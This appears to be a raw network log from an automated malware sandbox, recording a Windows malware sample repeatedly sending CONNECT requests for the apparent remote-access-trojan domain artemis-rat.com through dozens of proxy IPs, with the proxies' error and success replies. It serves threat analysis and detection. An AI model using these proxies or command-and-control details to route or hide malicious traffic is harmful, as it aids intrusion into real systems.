                                              Mar 11, 2024 08:37:19.641247988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.795550108 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              624192.168.2.45176543.128.107.25188887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.649646044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.008243084 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              625192.168.2.451736171.235.166.22240197284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.650599957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.122306108 CET228INHTTP/1.0 502 Bad Gateway
                                              Connection: close
                                              Content-type: text/html; charset=utf-8
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              626192.168.2.45186643.155.165.196156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.656099081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              627192.168.2.45199547.89.184.1831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.659534931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.875950098 CET38INHTTP/1.1 200 OK
                                              content-length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              628192.168.2.45200138.162.26.9931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.664947987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.078397989 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              629192.168.2.45183645.11.95.16660057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.665172100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.381787062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              630192.168.2.451812103.118.46.17780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.666213989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              631192.168.2.451912211.222.252.18781977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.668154001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              632192.168.2.4520193.12.144.14631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.670161963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.588566065 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:45 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              633192.168.2.452141104.16.109.213807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.679976940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.834225893 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              634192.168.2.45190147.93.121.200807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.682909012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.001034975 CET172INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.4.4</center></body></html>
                                              Mar 11, 2024 08:37:20.002135992 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              635192.168.2.45205138.162.15.21231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.688559055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.099884033 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              636192.168.2.452167172.67.181.89807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.690824032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.845412970 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              637192.168.2.45109537.187.73.7161137284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.692759991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.866213083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              638192.168.2.45197572.210.208.10141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.692886114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              639192.168.2.45193351.75.126.150341447284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.693037033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.381786108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              640192.168.2.45197870.166.167.38577287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.694833994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              641192.168.2.45197772.195.34.4241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.695774078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              642192.168.2.4518168.137.92.8880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.696770906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.076801062 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              643192.168.2.45194651.38.63.124109837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.697499037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              644192.168.2.449742162.214.225.223549177284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.699994087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.866472960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866709948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.866605997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.866540909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:55.866204023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
